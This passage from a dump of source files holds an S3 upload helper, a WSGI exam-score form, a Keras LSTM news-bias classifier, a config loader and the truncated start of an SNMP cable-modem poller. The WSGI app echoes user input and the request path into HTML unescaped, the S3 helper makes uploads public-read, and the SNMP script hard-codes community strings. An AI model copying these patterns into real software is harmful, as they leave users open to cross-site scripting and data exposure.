addrbook example\n\"\"\"\n\ndef s3_upload(uploaded_file, id):\n    s3conn = boto.connect_s3(AWS_ACCESS_KEY,AWS_SECRET_ACCESS_KEY)\n    bucket = s3conn.get_bucket(S3_BUCKET)\n\n    k = Key(bucket)\n    k.key = 'id-' + str(id)\n    k.content_type = uploaded_file.content_type\n\n    if hasattr(uploaded_file,'temporary_file_path'):\n        k.set_contents_from_filename(uploaded_file.temporary_file_path())\n    else:\n        k.set_contents_from_string(uploaded_file.read())\n\n    k.set_canned_acl('public-read')\n\n    return k.generate_url(expires_in=0, query_auth=False)\n\ndef s3_delete(id):\n    s3conn = boto.connect_s3(AWS_ACCESS_KEY,AWS_SECRET_ACCESS_KEY)\n    bucket = s3conn.get_bucket(S3_BUCKET)\n\n    k = Key(bucket)\n    k.key = 'id-' + str(id)\n    k.delete()","sub_path":"nanoblog/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"552055108","text":"#2021.03.18\r\n\r\n# Create a WSGI application.\r\n# “/university” responds with a form that asks the user to enter their name and their scores in the\r\n# mathematics, Latvian language and foreign language secondary school exams (0–100).\r\n# When the form is submitted, “/university_response” opens and shows whether the person can enter university.\r\n# A person can enter university if every exam score is at least 40 points.\r\n# Optional:\r\n# When the form is submitted, the user stays on the “/university” page, but it is shown whether the person can enter university.\r\n\r\nfrom wsgiref.simple_server import make_server\r\nfrom urllib.parse import parse_qs\r\n\r\n\r\ndef form(environ):\r\n\r\n    response_content = \"\"\"\r\n
    <form action=\"\" method=\"post\">\r\n        Full name: <input type=\"text\" name=\"name\"><br>\r\n        Math: <input type=\"text\" name=\"grade_math\"><br>\r\n        LV: <input type=\"text\" name=\"grade_lv\"><br>\r\n        RU: <input type=\"text\" name=\"grade_ru\"><br>\r\n        <input type=\"submit\" value=\"Submit\">\r\n    </form>\r\n    \"\"\"\r\n\r\n    return [response_content.encode()]\r\n
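# Note: parse_qs(\"name=Ada&grade_math=55\") returns\r\n# {\"name\": [\"Ada\"], \"grade_math\": [\"55\"]}, which is why name() below indexes with [0].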
\r\n\r\ndef name(environ):\r\n    try:\r\n        length = int(environ[\"CONTENT_LENGTH\"])\r\n    except ValueError:\r\n        length = 0\r\n\r\n    wsgi_input = environ[\"wsgi.input\"].read(length).decode()\r\n    form_data = parse_qs(wsgi_input)\r\n\r\n    try:\r\n        grade_math = int(form_data[\"grade_math\"][0])\r\n        grade_lv = int(form_data[\"grade_lv\"][0])\r\n        grade_ru = int(form_data[\"grade_ru\"][0])\r\n    except:  # PEP 8: E722 do not use bare 'except'\r\n        return [\"Wrong or no values given!\".encode()]\r\n\r\n    can_apply = \"can\"\r\n    if grade_math < 40 or grade_lv < 40 or grade_ru < 40:\r\n        can_apply = \"can not\"\r\n\r\n    response_content = f\"\"\"\r\n        Name: {form_data[\"name\"][0]}<br>\r\n        Math: {form_data[\"grade_math\"][0]}<br>\r\n        LV: {form_data[\"grade_lv\"][0]}<br>\r\n        RU: {form_data[\"grade_ru\"][0]}<br>\r\n        <br>\r\n        {form_data[\"name\"][0]} {can_apply} apply to the university\r\n    \"\"\"\r\n\r\n    return [response_content.encode()]\r\n\r\n\r\ndef application(environ, start_response):\r\n\r\n    status = \"200 OK\"\r\n    headers = [(\"Content-type\", \"text/html\")]\r\n\r\n    path = environ[\"PATH_INFO\"]\r\n    method = environ[\"REQUEST_METHOD\"]\r\n\r\n    if path == \"/university\":\r\n        if method == \"GET\":\r\n            response_content = form(environ)\r\n        if method == \"POST\":\r\n            response_content = name(environ)\r\n    else:\r\n        response_content = [f\"<h1>Welcome to homepage!</h1><br>You browsed for: {path}\".encode()]\r\n\r\n    start_response(status, headers)\r\n\r\n    return response_content\r\n\r\n\r\nHOST = \"localhost\"\r\nPORT = 8000\r\n\r\nwith make_server(HOST, PORT, application) as server:\r\n    print(f\"Serving at http://{HOST}:{PORT}\")\r\n    server.serve_forever()\r\n","sub_path":"uzd_13.py","file_name":"uzd_13.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"115020987","text":"#!/usr/bin/env python\n\n# Parameters:\n# --training_data=<directory>\n#     Directory that contains the articles XML file with the articles for which a prediction should be made.\n# --outputFile=<file>\n#     File to which the term frequency vectors will be written. Will be overwritten if it exists.\n\n# Output is one article per line:\n#     <article id> <term>:<count> <term>:<count> ...
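#\n#     For example (illustrative), article 42 whose text mentions \"news\" five\n#     times and \"vote\" twice could yield the line: 42 news:5 vote:2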
\n\nfrom __future__ import print_function\n\nimport getopt\nimport json\nimport codecs\nimport os\nimport re\nimport sys\nimport time\nimport xml.sax\nfrom array import array\nfrom collections import Counter, OrderedDict\nfrom tqdm import tqdm\n\nimport lxml.etree\nimport lxml.sax\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom gensim.models.keyedvectors import KeyedVectors\nfrom keras.datasets import imdb\nfrom keras.layers import LSTM, Dense, Embedding\nfrom keras.models import Sequential\nfrom keras.preprocessing import sequence\nfrom keras.preprocessing.text import (Tokenizer, hashing_trick, one_hot,\n                                      text_to_word_sequence)\n\n#from gensim import KeyedVectors\n\ndef print_usage(filename, message):\n    print(message)\n    print(\"Usage: python %s --training_data <file> --training_labels <file> --validation_data <file> --validation_labels <file> --test_data <file> --test_labels <file>\" % filename)\n\n########## OPTIONS HANDLING ##########\ndef parse_options():\n    \"\"\"Parses the command line options.\"\"\"\n    try:\n        long_options = [\"training_data=\", \"training_labels=\", \"validation_data=\", \"validation_labels=\", \"test_data=\", \"test_labels=\"]\n        opts, _ = getopt.getopt(sys.argv[1:], \"\", long_options)\n    except getopt.GetoptError as err:\n        print(str(err))\n        sys.exit(2)\n\n    training_data = \"undefined\"\n    training_labels = \"undefined\"\n    validation_data = \"undefined\"\n    validation_labels = \"undefined\"\n    test_data = \"undefined\"\n    test_labels = \"undefined\"\n\n    for opt, arg in opts:\n        if opt in (\"-trd\", \"--training_data\"):\n            training_data = arg\n        elif opt in (\"-trl\", \"--training_labels\"):\n            training_labels = arg\n        elif opt in (\"-vd\", \"--validation_data\"):\n            validation_data = arg\n        elif opt in (\"-vl\", \"--validation_labels\"):\n            validation_labels = arg\n        elif opt in (\"-ted\", \"--test_data\"):\n            test_data = arg\n        elif opt in (\"-tel\", \"--test_labels\"):\n            test_labels = arg\n        else:\n            assert False, \"Unknown option.\"\n\n    if training_data == \"undefined\":\n        message = \"training_data, the directory that contains the training articles XML file, is undefined.\"\n        print_usage(sys.argv[0], message)\n        sys.exit()\n    elif not os.path.exists(training_data):\n        sys.exit(\"The input dataset folder does not exist (%s).\" % training_data)\n\n    if training_labels == \"undefined\":\n        message = \"Label directory, the directory that contains the articles label datafile, is undefined. Use option -l or --training_labels.\"\n        print_usage(sys.argv[0], message)\n        sys.exit()\n    elif not os.path.exists(training_labels):\n        sys.exit(\"The label folder does not exist (%s).\" % training_labels)\n    \n    if validation_data == \"undefined\":\n        message = \"validation_data is undefined\"\n        print_usage(sys.argv[0], message)\n        sys.exit()\n    elif not os.path.exists(validation_data):\n        sys.exit(\"the validation dataset file does not exist (%s).\" % validation_data)\n\n    if validation_labels == \"undefined\":\n        message = \"validation_labels is undefined\"\n        print_usage(sys.argv[0], message)\n        sys.exit()\n    elif not os.path.exists(validation_labels):\n        sys.exit(\"the validation_labels file does not exist (%s).\" % validation_labels)\n\n    if test_data == \"undefined\":\n        message = \"Test data directory is undefined. Use --test_data option.\"\n        print(sys.argv[0], message)\n        sys.exit()\n    elif not os.path.exists(test_data):\n        sys.exit(\"The test data folder does not exist (%s).\" % test_data)\n\n    if test_labels == \"undefined\":\n        message = \"Test label directory is undefined. 
Use --test_labels option.\"\n print(sys.argv[0], message)\n sys.exit()\n elif not os.path.exists(test_labels):\n sys.exit(\"The test label folder does not exist (%s).\" % test_labels)\n\n return (training_data, training_labels, validation_data, validation_labels, test_data, test_labels)\n\ndef clean_and_count(article, data):\n for token in article.text.split():\n if token in data.keys():\n data[token] += 1\n else:\n data[token] = 1\n\nclass customException(Exception):\n pass\n\ndef parse(datafile, labelfile, mode, max_articles, word_index={}, data=[]):\n\n count = 0\n left_count = 0\n right_count = 0\n neutral_count = 0\n max_articles = int(max_articles)\n\n tree = lxml.etree.parse(datafile)\n articles = tree.getroot().getchildren()\n\n # If both are provided\n # ie. The case of any data parsing, or word indexing\n if datafile != \"\" and labelfile != \"\":\n label_tree = lxml.etree.parse(labelfile)\n labels = label_tree.getroot().getchildren()\n\n # If only the datafile is provided\n # ie. The case of training_labels.xml\n elif labelfile == \"\":\n labels = articles \n\n for article, label in zip(articles, labels):\n if mode == 'y':\n print('max_articles=', max_articles)\n print(\"\\tMode = \" + mode)\n print(\"Total count:\", count)\n print(\"\\tleft:\\t\\t\", left_count)\n print(\"\\tright:\\t\\t\", right_count)\n print(\"\\tneutral:\\t\", neutral_count)\n\n # Once we've maintained our distribution, stop parsing\n if (count == max_articles and \n left_count == max_articles/4 and \n right_count == max_articles/4 and \n neutral_count == max_articles/2):\n\n print(\"\\tMode = \" + mode)\n print(\"Total count:\", count)\n print(\"\\tleft:\\t\\t\", left_count)\n print(\"\\tright:\\t\\t\", right_count)\n print(\"\\tneutral:\\t\", neutral_count)\n\n return\n else:\n b = label.get('bias')\n\n if left_count == max_articles/4 and b == 'left':\n continue\n elif right_count == max_articles/4 and b == 'right':\n continue\n elif neutral_count == max_articles/2 and b not in ['left', 'right']:\n continue\n else:\n if b == 'left':\n left_count += 1\n elif b == 'right':\n right_count += 1\n else:\n neutral_count += 1\n\n # Do stuff\n if mode == 'widx':\n clean_and_count(article, data)\n elif mode == \"x\":\n\n row = []\n \n # Split into sequence of words\n textcleaned = article.text.split()\n\n # Look up each word's index in freq index and append\n for word in textcleaned:\n idx = word_index[word]\n row.append(idx)\n \n # Append to sequence array\n data.append(row)\n\n elif mode == \"y\":\n\n bias = article.get('bias')\n\n if (bias == 'left'):\n left_count += 1\n elif (bias == 'right'):\n right_count += 1\n else:\n neutral_count += 1\n\n hp = article.get('hyperpartisan')\n\n if hp in ['true', 'True', 'TRUE']:\n data.append(1)\n elif hp in ['false', 'False', 'FALSE']:\n data.append(0)\n else:\n err = \"Mislabeled or unlabeled data found: \" + hp\n raise Exception(err)\n\n count += 1\n\n########## SAX FOR STREAM PARSING ##########\nclass HyperpartisanNewsParser(xml.sax.ContentHandler):\n def __init__(self, mode, word_index={}, data=[]):\n xml.sax.ContentHandler.__init__(self)\n self.mode = mode\n self.lxmlhandler = \"undefined\"\n self.data = data\n self.word_index = word_index\n self.counter = 0\n self.left_count = 0\n self.right_count = 0\n self.neutral_count = 0\n\n def startElement(self, name, attrs):\n if name != \"articles\":\n if name == \"article\":\n self.lxmlhandler = lxml.sax.ElementTreeContentHandler()\n\n self.lxmlhandler.startElement(name, attrs)\n\n def characters(self, data):\n if 
self.lxmlhandler != \"undefined\":\n self.lxmlhandler.characters(data)\n\n def endElement(self, name):\n if self.lxmlhandler != \"undefined\":\n self.lxmlhandler.endElement(name)\n if name == \"article\":\n if self.mode == \"widx\":\n clean_and_count(self.lxmlhandler.etree.getroot(), self.data)\n elif self.mode == \"x\":\n\n article = self.lxmlhandler.etree.getroot()\n\n row = []\n \n # Split into sequence of words\n textcleaned = article.text.split()\n\n # Look up each word's index in freq index and append\n for word in textcleaned:\n idx = self.word_index[word]\n row.append(idx)\n \n # Append to sequence array\n self.data.append(row)\n\n elif self.mode == \"y\":\n article = self.lxmlhandler.etree.getroot()\n\n bias = article.get('bias')\n\n if (bias == 'left'):\n self.left_count += 1\n elif (bias == 'right'):\n self.right_count += 1\n else:\n self.neutral_count += 1\n\n hp = article.get('hyperpartisan')\n\n if hp in ['true', 'True', 'TRUE']:\n self.data.append(1)\n elif hp in ['false', 'False', 'FALSE']:\n self.data.append(0)\n else:\n err = \"Mislabeled or unlabeled data found: \" + hp\n raise Exception(err)\n \n self.counter += 1\n self.lxmlhandler = \"undefined\"\n\n def endDocument(self):\n if self.mode == 'y':\n print(\"Total count:\", self.counter)\n print(\"\\tleft:\\t\\t\", self.left_count)\n print(\"\\tright:\\t\\t\", self.right_count)\n print(\"\\tneutral:\\t\", self.neutral_count)\n else:\n print(\"Total articles parsed:\", self.counter)\n\n\ndef create_word_index(datafile, labelfile, mode, max_articles=sys.maxsize):\n\n # Create a new file with a blank dictionary\n # training.json\n # test.json\n idx_file = \"data/word_indexes/\" + mode + \".json\"\n with open(idx_file, 'w') as f:\n data = {}\n json.dump(data,f)\n f.close()\n \n with open(datafile) as inputRunFile:\n try:\n xml.sax.parse(inputRunFile, HyperpartisanNewsParser(mode=\"widx\", data=data))\n except customException as e:\n print(e, end='')\n\n f = open(idx_file, 'w+')\n\n # Create a sorted dictionary\n o = OrderedDict(Counter(data).most_common(len(data)))\n\n # Replaces dict value with its index\n # {'blue': 56, 'brown': 28, 'red': 24} => {'blue': 0, 'brown': 1, 'red': 2}\n # This decreases runtime DRAMATICALLY.\n for w in enumerate(o):\n o[w[1]] = w[0]\n\n # Write dictionary to file\n json.dump(o, f)\n f.close()\n\n# Reads in data files\ndef get_data(filename, filetype, mode, data, labelfile=\"\", word_index={}):\n\n with open(filename) as iFile:\n xml.sax.parse( iFile, \n HyperpartisanNewsParser(\n mode=mode,\n word_index=word_index,\n data=data))\n\n# Loads data from xml files and transforms them for use with keras\ndef load_data(tr, tr_labels, val, val_labels, te, te_labels, num_words=None, skip_top=0, maxlen=None,\n seed=113, start_char=1, oov_char=2, index_from=3):\n\n start = time.time()\n with open('data/word_indexes/training.json', 'r') as f:\n training_widx = {}\n training_widx = json.load(f)\n\n finish = time.time()\n print('len(training_widx)= ', len(training_widx), \"\\n\")\n print(\"Loading training_widx took:\", finish-start)\n\n start = time.time()\n with open('data/word_indexes/validation.json', 'r') as f:\n validation_widx = {}\n validation_widx = json.load(f)\n\n finish = time.time()\n print(\"Loading validation_widx took:\", finish-start)\n\n start = time.time()\n with open('data/word_indexes/test.json', 'r') as f:\n test_widx = {}\n test_widx = json.load(f)\n\n finish = time.time()\n print(\"Loading test_widx took:\", finish-start, \"\\n\")\n\n # Start with python lists, then convert to numpy 
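The rank-assignment step in create_word_index above is easiest to see on the toy dict from its own comment; a self-contained sketch of the same transform:

from collections import Counter, OrderedDict

# Sort words by frequency, then replace each count with its rank (0 = most frequent).
data = {"blue": 56, "brown": 28, "red": 24}
o = OrderedDict(Counter(data).most_common(len(data)))
for rank, word in enumerate(list(o)):
    o[word] = rank
print(o)  # blue -> 0, brown -> 1, red -> 2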
when finished for better runtime\n x_train = []\n y_train = []\n x_val = []\n y_val = []\n x_test = []\n y_test = []\n\n # Populate x_train\n #print(\"Populating x_train...\")\n start = time.time()\n get_data(filename=tr, labelfile=tr_labels, filetype='xml', mode=\"x\", data=x_train, word_index=training_widx)\n finish = time.time()\n print(\"get_data(x_train) took:\", finish-start)\n\n # Populate y_train\n #print(\"Populating y_train...\")\n start = time.time()\n get_data(filename=tr_labels, filetype='xml', mode=\"y\", data=y_train)\n finish = time.time()\n print(\"get_data(y_train) took:\", finish-start)\n\n # Populate x_val\n #print(\"Populating x_val...\")\n start = time.time()\n get_data(filename=val, labelfile=val_labels, filetype='xml', mode=\"x\", data=x_val, word_index=validation_widx)\n finish = time.time()\n print(\"get_data(x_val) took:\", finish-start)\n\n # Populate y_val\n #print(\"Populating y_val...\")\n start = time.time()\n get_data(filename=val_labels, filetype='xml', mode=\"y\", data=y_val)\n finish = time.time()\n print(\"get_data(y_val) took:\", finish-start)\n\n # Populate x_test\n #print(\"Populating x_test...\")\n start = time.time()\n get_data(filename=te, labelfile=te_labels, filetype='xml', mode='x', data=x_test, word_index=test_widx)\n finish = time.time()\n print(\"get_data(x_test) took:\", finish-start)\n\n # Populate y_test\n #print(\"Populating y_test...\\n\")\n start = time.time()\n get_data(filename=te_labels, filetype='xml', mode='y', data=y_test)\n finish = time.time()\n print(\"get_data(y_test) took:\", finish-start)\n\n print(\"Shuffling data...\", end='')\n start = time.time()\n x_train = np.array(x_train)\n y_train = np.array(y_train)\n \n x_val = np.array(x_val)\n y_val = np.array(y_val)\n\n x_test = np.array(x_test)\n y_test = np.array(y_test)\n \n _remove_long_seq = sequence._remove_long_seq\n\n # Makes random numbers predictable based on (seed)\n np.random.seed(seed)\n\n # Returns an array of evenly spaced values ranged [0, len(x_train))\n # In english = it's getting an array of the indices of x_train\n # E.G. 
if len(x_train) = 3, indices => [0,1,2]\n indices = np.arange(len(x_train))\n\n # Shuffles the contents of indices\n np.random.shuffle(indices)\n\n # Rearranges x_train to match ordering of indices\n # x_train is normally x_train[0], x_train[1], x_train[2]\n # if indices = [0,2,1], then x_train[indices] => x_train[0], x_train[2], x_train[1]\n x_train = x_train[indices]\n y_train = y_train[indices]\n\n # Repeat above for validation set\n indices = np.arange(len(x_val))\n np.random.shuffle(indices)\n x_val = x_val[indices]\n y_val = y_val[indices]\n\n # Repeat above for the test set\n indices = np.arange(len(x_test))\n np.random.shuffle(indices)\n x_test = x_test[indices]\n y_test = y_test[indices]\n\n finish = time.time()\n print(finish-start)\n\n # Append all datasets\n print(\"Concatenating...\", end='')\n start = time.time()\n xs = np.concatenate([x_train, x_val, x_test])\n ys = np.concatenate([y_train, y_val, y_test])\n finish = time.time()\n print(finish-start)\n\n print(\"start_char/index_from...\", end='')\n start = time.time()\n if start_char is not None:\n # Adds a start_char to the beginning of each sentence\n xs = [[start_char] + [w + index_from for w in x] for x in xs]\n elif index_from:\n # This shifts the indexes by index_from\n xs = [[w + index_from for w in x] for x in xs]\n finish = time.time()\n print(finish-start)\n\n # Trims sentences down to maxlen\n print(\"Maxlen...\", end='')\n start = time.time()\n if maxlen:\n xs, ys = _remove_long_seq(maxlen, xs, ys)\n if not xs:\n raise ValueError('After filtering for sequences shorter than maxlen=' +\n str(maxlen) + ', no sequence was kept. Increase maxlen.')\n finish = time.time()\n print(finish-start)\n\n # Calculates the max val in xs\n print(\"Num_words = max...\", end='')\n start = time.time()\n if not num_words:\n num_words = max([max(x) for x in xs])\n finish = time.time()\n print(finish-start)\n\n # By convention, use 2 as OOV word\n # Reserve 'index_from' (3 by default) characters:\n # 0 => padding, 1 => start, 2 => OOV\n print(\"Skip_top/num_words/oov...\", end='')\n start = time.time()\n if oov_char is not None:\n # If a word is OOV, replace it w/ 2\n # Also remove any words that are < skip_top or > num_words\n xs = [[w if (skip_top <= w < num_words) else oov_char for w in x] for x in xs]\n else:\n # Only remove words that are < skip_top or > num_words\n xs = [[w for w in x if skip_top <= w < num_words] for x in xs]\n finish = time.time()\n print(finish-start)\n\n train_idx = len(x_train)\n val_idx = len(x_val)\n\n print(\"Partitioning...\", end='')\n start = time.time()\n # Partition the newly preprocessed instances back into their respective arrays\n x_train, y_train = np.array(xs[:train_idx]), np.array(ys[:train_idx])\n x_val, y_val = np.array(xs[train_idx:(train_idx+val_idx)]), np.array(ys[train_idx:(train_idx+val_idx)])\n x_test, y_test = np.array(xs[(train_idx+val_idx):]), np.array(ys[(train_idx+val_idx):])\n finish = time.time()\n print(finish-start, \"\\n\")\n return (x_train, y_train), (x_val, y_val), (x_test, y_test)\n\ndef get_pretrained_embeddings(tr_widx, embedding_file):\n\n with open(tr_widx, 'r') as w:\n word_index = {}\n word_index = json.load(w)\n \n # First, read in the embedding_index\n # Reference begin: https://blog.keras.io/using-pre-trained-word-embeddings-in-a-keras-model.html\n EMBEDDING_DIM = 300\n\n print(\"Loading word2vec binary...\", end='')\n start = time.time()\n # Takes about 50 seconds\n embedding = KeyedVectors.load_word2vec_format(embedding_file, binary=True)\n finish = 
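load_data above follows the keras imdb conventions for start_char, index_from and oov_char; a toy run of those two list transforms with the same default values (the sequences are invented for illustration):

start_char, index_from, oov_char = 1, 3, 2
skip_top, num_words = 0, 8

xs = [[0, 1, 4], [2, 5]]  # raw word indexes
# prepend the start marker and shift every index up by index_from
xs = [[start_char] + [w + index_from for w in x] for x in xs]
print(xs)  # [[1, 3, 4, 7], [1, 5, 8]]
# clamp to the vocabulary window, replacing out-of-range words with oov_char
xs = [[w if skip_top <= w < num_words else oov_char for w in x] for x in xs]
print(xs)  # [[1, 3, 4, 7], [1, 5, 2]]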
time.time()\n print(finish-start, \"\\n\")\n \n print(\"Generating embedding matrix...\", end='')\n start = time.time()\n\n embedding_matrix = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\n with tqdm(total=len(word_index), unit='it', unit_scale=True, unit_divisor=1024) as pbar:\n i = 0\n unk_words = []\n for word in word_index:\n if word in embedding.wv.vocab:\n embedding_vector = embedding.wv[word]\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n else:\n unk_words.append(word)\n \n pbar.update()\n i += 1\n\n finish = time.time()\n print(finish-start)\n print(\"Num of words in corpus vocabulary not found in word2vec embedding:\", len(unk_words))\n\n return embedding_matrix\n # Reference end\n\ndef main(tr, tr_labels, val, val_labels, te, te_labels):\n start = time.time()\n # Build training set word index\n print(\"\\nBuilding training word index...\")\n create_word_index(datafile=tr, labelfile=tr_labels, mode=\"training\")\n finish = time.time()\n print(\"Building training widx took:\", finish - start, \"\\n\")\n\n start = time.time()\n # Build validation set word index\n print(\"Building validation word index...\")\n create_word_index(datafile=val, labelfile=val_labels, mode=\"validation\")\n finish = time.time()\n print(\"Building validation widx took:\", finish-start, \"\\n\")\n\n start = time.time()\n # Build test set word index\n print(\"Building test word index...\")\n create_word_index(datafile=te, labelfile=te_labels, mode=\"test\")\n finish = time.time()\n print('Building test widx took:', finish-start, \"\\n\")\n\n # Load configuration\n with open('run.json', 'r') as j:\n config = {}\n config = json.load(j)\n\n max_features = config['max_features'] # Word Embedding #default 20000\n skip_top = config['skip_top'] # Skip the most common words #default 0\n num_words = config['num_words'] # Upper limit for word commonality #default 0\n maxlen = config['maxlen'] # Maximum length of a sequence (sentence) #default 80\n\n start = time.time()\n # Load and preprocess data\n (x_train, y_train), (x_val, y_val), (x_test, y_test) = load_data(tr, tr_labels, val, val_labels, te, te_labels,\n skip_top=skip_top, num_words=num_words, maxlen=None)\n finish = time.time()\n print(\"Load_data took a total of:\", finish-start)\n \n # ML Stuff now\n print(len(x_train), 'train sequences')\n print(len(x_val), 'validation sequences')\n print(len(x_test), 'test sequences\\n')\n\n print('Pad sequences (samples x time)...', end='')\n start = time.time()\n x_train = sequence.pad_sequences(x_train, maxlen=maxlen)\n x_val = sequence.pad_sequences(x_val, maxlen=maxlen)\n x_test = sequence.pad_sequences(x_test, maxlen=maxlen)\n finish = time.time()\n print(finish-start)\n\n batch_size = config['batch_size'] # Number of instances before updating weights #default 32\n epochs = config['epochs'] # Number of epochs #default 15\n\n # If we don't want any of these optional args,\n # we will have to remove them from the LSTM call itself\n go_backwards = True if (config['go_backwards'] == \"True\") else False\n dropout = config['dropout']\n recurrent_dropout = config['recurrent_dropout']\n #bias_regularizer = config['bias_regularizer']\n\n print('Build model...')\n\n # Obtain and compute embedding matrix\n print(\"Get pretrained word embeddings...\")\n embedding_matrix = get_pretrained_embeddings( 'data/word_indexes/training.json',\n 'data/embeddings/GoogleNews-vectors-negative300.bin')\n\n model = Sequential()\n\n start = time.time()\n #model.add(Embedding(max_features, 128))\n \n with 
open('data/word_indexes/training.json', 'r') as f:\n word_index = {}\n word_index = json.load(f)\n\n EMBEDDING_DIM = 300\n model.add(Embedding(len(word_index) + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=maxlen,\n trainable=False))\n \n finish = time.time()\n print(\"adding embedding layer took:\", finish-start)\n\n start = time.time()\n model.add(LSTM( 128, #bias_regularizer = bias_regularizer, \n dropout=dropout, recurrent_dropout=recurrent_dropout, \n go_backwards=go_backwards))\n finish = time.time()\n print(\"adding LSTM layer took:\", finish-start)\n\n start = time.time()\n model.add(Dense(1, activation='sigmoid'))\n finish = time.time()\n print(\"adding Dense sigmoid:\", finish-start)\n\n start = time.time()\n model.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n finish = time.time()\n print(\"Compiling model took:\", finish-start)\n\n print(model.summary())\n\n start = time.time()\n history = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_val, y_val),\n verbose=1)\n finish = time.time()\n print(\"Fitting model took:\", finish-start)\n # Plot training & validation accuracy values\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('Model accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Validation'], loc='upper left')\n plt.yticks(np.arange(0.4, 1.0, 0.05))\n\n\n plot_prefix = str(int(tr.split('/')[-1].split('.')[0]) + int(val.split('/')[-1].split('.')[0]) + int(te.split('/')[-1].split('.')[0]))\n #plot_prefix = plot_prefix.split('.')[0]\n plot_name = plot_prefix + '.png'\n plot_name = 'results/runs/' + plot_name\n plot_config = 'results/runs/' + plot_prefix + '.config'\n\n i = 1\n jpg = '.jpg'\n conf = '.config'\n if os.path.exists(plot_name):\n n = plot_name.split('.')[0]\n plot_name = n + '_' + str(i) + jpg\n plot_config = n + '_' + str(i) + conf\n if os.path.exists(plot_name):\n while os.path.exists(plot_name):\n n = plot_name.split('.')[0]\n n = n.split('_')[0]\n plot_name = n + '_' + str(i) + jpg\n plot_config = n + '_' + str(i) + conf\n i += 1\n \n plt.savefig(plot_name)\n with open(plot_config, 'w') as f:\n json.dump(config, f, indent=4)\n #plt.show()\n\n # Plot training & validation loss values\n #plt.plot(history.history['loss'])\n #plt.plot(history.history['val_loss'])\n #plt.title('Model loss')\n #plt.ylabel('Loss')\n #plt.xlabel('Epoch')\n #plt.legend(['Train', 'Validation'], loc='upper left')\n #plt.show()\n #print(\"val_loss:\\t\", history['val_loss'])\n #print(\"val_acc:\\t\", history['val_acc'])\n #print(\"loss:\\t\\t\", history['loss'])\n #print(\"acc:\\t\\t\", history['acc'])\n\n # DO NOT UNCOMMENT THIS\n #score, acc = model.evaluate(x_test, y_test,\n # batch_size=batch_size)\n #print('Test score:', score)\n #print('Test accuracy:', acc)\n\nif __name__ == '__main__':\n main(*parse_options())\n","sub_path":"hp_lstm_old.py","file_name":"hp_lstm_old.py","file_ext":"py","file_size_in_byte":26601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"373161464","text":"import os\nfrom enum import Enum\n\nfrom yaml import safe_load\n\n\nclass Colors(Enum):\n ADD = \"green\"\n UPDATE = \"yellow\"\n IMPORTANT = \"yellow\"\n ERROR = \"red\"\n\n\nclass Entry:\n def __init__(\n self,\n label,\n redmine_api_key=None,\n toggl_api_key=None,\n jira_username=None,\n jira_url=None,\n task_patterns=None,\n ):\n self.label = label\n self.redmine_api_key = 
redmine_api_key\n        self.toggl = toggl_api_key\n        self.jira_username = jira_username\n        self.jira_url = jira_url\n        self.task_patterns = task_patterns\n\n    def __str__(self):\n        if self.redmine_api_key:\n            return \"{}: {}\".format(self.toggl, self.redmine_api_key)\n        else:\n            return \"{}: {}@{}\".format(self.toggl, self.jira_username, self.jira_url)\n\n\nclass Config:\n    def __init__(self, toggl, redmine, entries, mattermost):\n        self.toggl = toggl\n        self.redmine = redmine\n        self.entries = entries\n        self.mattermost = mattermost\n\n    @classmethod\n    def fromFile(cls, path=\"config.yml\"):\n        if not os.path.exists(path):\n            raise Exception(\n                \"File {} does not exist. Check out config.yml.example and create config.yml\".format(\n                    path\n                )\n            )\n\n        with open(path) as input:\n            return Config.fromYml(input)\n\n    @classmethod\n    def fromYml(cls, yml):\n        deserialized = safe_load(yml)\n\n        if \"toggl\" not in deserialized:\n            raise Exception('\"toggl\" element not found in config')\n\n        toggl = deserialized[\"toggl\"]\n\n        redmine = deserialized.get(\"redmine\", None)\n\n        if \"mattermost\" in deserialized:\n            if isinstance(deserialized[\"mattermost\"], str):\n                print(\"Warning: old config format\")\n\n                mattermost = {\"url\": deserialized[\"mattermost\"]}\n            else:\n                mattermost = deserialized[\"mattermost\"]\n\n                if \"url\" not in mattermost:\n                    raise Exception('Expected \"url\" param in \"mattermost\" section')\n\n        else:\n            mattermost = None\n\n        if \"entries\" not in deserialized:\n            raise Exception('\"entries\" element not found in config')\n\n        entries = []\n\n        for entry in deserialized[\"entries\"]:\n            entries.append(Entry(**entry))\n\n        return cls(toggl, redmine, entries, mattermost)\n\n    def __str__(self):\n        return \"\"\"config:\n\\ttoggl url:\\t{}\n\\tredmine url:\\t{}\n\n\\tentries:\n\\t\\t{}\"\"\".format(\n            self.toggl, self.redmine, \"\\n\\t\\t\".join([str(e) for e in self.entries])\n        )\n\n\nif __name__ == \"__main__\":\n    # Config.__init__ needs four explicit arguments; load the default config.yml instead\n    config = Config.fromFile()\n    print(config)\n","sub_path":"togglsync/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"30949977","text":"import netsnmp\nimport binascii\nimport netaddr\nfrom netaddr import *\nfrom datetime import datetime\nimport csv\nimport ipaddress\n\n\n# open a file to stuff results in\nf=open('testresult', 'a')\n\n#append a timestamp to the file each time this program is run\nf.write(\"\\n\\n\\n\")\nsttime = datetime.now().strftime('%Y%m%d_%H:%M:%S')\nf.write(sttime + '\\n')\nf.write(\"\\n\")\n\n\n#info for the target CMTS\nhost_ipa=\"10.10.10.10\"\ncomm_string=\"public01\"\n\n\n#info for cable modems\ncm_comm_string=\"public\"\n\n\n# set up netsnmp session for that CMTS\nsession=netsnmp.Session(Version=2, Community=comm_string, DestHost=host_ipa, UseNumeric=1)\n\n\n\n\n# poll CMTS for list of registered modem MAC addresses using DOCS-IF3-MIB\n# this will 